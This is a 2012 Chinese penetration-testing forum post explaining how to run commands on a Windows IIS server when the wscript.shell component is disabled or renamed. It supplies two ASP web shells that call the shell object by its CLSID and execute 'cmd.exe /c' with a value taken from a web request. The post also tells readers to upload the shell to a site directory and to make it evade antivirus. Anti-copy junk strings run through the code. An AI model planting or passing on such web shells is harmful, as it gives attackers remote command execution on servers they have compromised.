找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3103|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    ! D1 Z% L0 U, ?* M
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。- y% P2 d" \8 Q- x
  • 要想让运行命令可以试试这种方法,成功率为五五之数。  q- f# W7 [. V4 e+ p1 o8 S5 _
  • 把下面代码复制:) Q% H! M( J5 q- \+ r9 i
  • <%
    & q% |- @9 j/ B" X' f% C! F
  • end if* J9 }' Y2 \/ |' x; |# K
  • response.write(”")/ Q" k8 W, v: ^
  • On Error Resume
    9 F& b1 r" P. C$ d8 {0 E. t  c. ]
  • Next- O0 m# Z0 ?* t* d, F
  • response.write oScriptlhn.exec(”cmd.exe /c” &
    " h6 V# o8 I, I9 Y8 |
  • request(”c”)).stdout.readall
    $ Q0 K1 O; ]$ V- J. k
  • response.write(”")1 E# ~1 c2 m( [) Q' g5 E4 p& ^
  • response.write(”")% G8 R+ Y* P4 j; e+ d2 e( H, l
  • response.write(”
    0 |1 Q" i  l8 g, e6 l' b
  • “)
    6 }# U( i# y& ?8 k
  • response.write(”")
    - R) M# k! r, a
  • %>
    . d" Y7 L& x5 `: L) ]
  • 保存为一个asp文件,然后传到网站目录上去
    % o7 a) j# x  z& \& R$ K# b
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    8 ~9 `# _" O; V, `
  • 我用此成功运行过cacls命令。
    - _3 D7 y! n; E% Y5 n9 m
  • 第二那就是运行时出错,可能限制某些代码执行
    0 m) a* q$ ~1 A; E) B1 n! D
  • 无wscript.shell组件提权又一个方法* N2 N0 R" p( _. x
  • <object runat=server id=oScriptlhn scope=page
    3 h. v- @0 }$ \
  • - e/ e# ~# l7 e
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>; D, m* x# ]8 r( O
  • <%if err then%> % F, G& c( K) q
  • <object runat=server id=oScriptlhn scope=page & t& L, @  V8 M9 O* k) p# z

  • 6 q( c# R$ x5 `. x( k
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>, E4 i1 A% G- j3 c1 {) }
  • <% 4 G+ C) U. S5 b# s2 j7 d3 P
  • end if 4 _* T8 [  |. R0 V. `; ~( y
  • response.write(”<textarea readonly cols=80
    + P0 z. W# P& s  Q9 L

  • * _* L- P' ]: R% o1 p/ i
  • rows=20>”) * Q* I6 e; c4 K
  • On Error Resume Next
    . D* D) g/ m5 n7 ]4 J
  • response.write & ?; h; i' l; T, j4 }5 c* z% C# D

  • 6 }; p; M# O/ D; H' D+ [
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall2 w* O2 B' b& L! w9 N% Z
  • response.write(”</textarea>”) & o& e  d* I+ x$ |2 E9 a
  • response.write(”<form ( e# r+ @0 J3 o- }) n

  • ; W& Y: c) E$ e, i) O  P
  • method=’post’>”) / E. b2 E& l$ I; i0 {' B
  • response.write(”<input type=text name=’c' 2 ]2 p  S4 n8 J) ~/ r
  • # u' a; B( i  c2 w
  • size=60><br>”) . c% c7 B3 Y9 t, ]9 `% x+ n4 r
  • response.write(”<input type=submit
    * j) d- ^+ O, Q; `$ S) C
  • ) `, R8 n2 |9 N6 x+ k
  • value=’执行’></form>”) ( M- e; d3 ^; e  S% v, L
  • %>
    & @  M) w# w" i' x) [& E
  • 保存为ASP,此代码可能被杀,请注意免杀。
    / u  ^/ D: D! Z& b- w- M: N
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    7 |& n# k) p, p8 n6 u: ^% j+ V
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表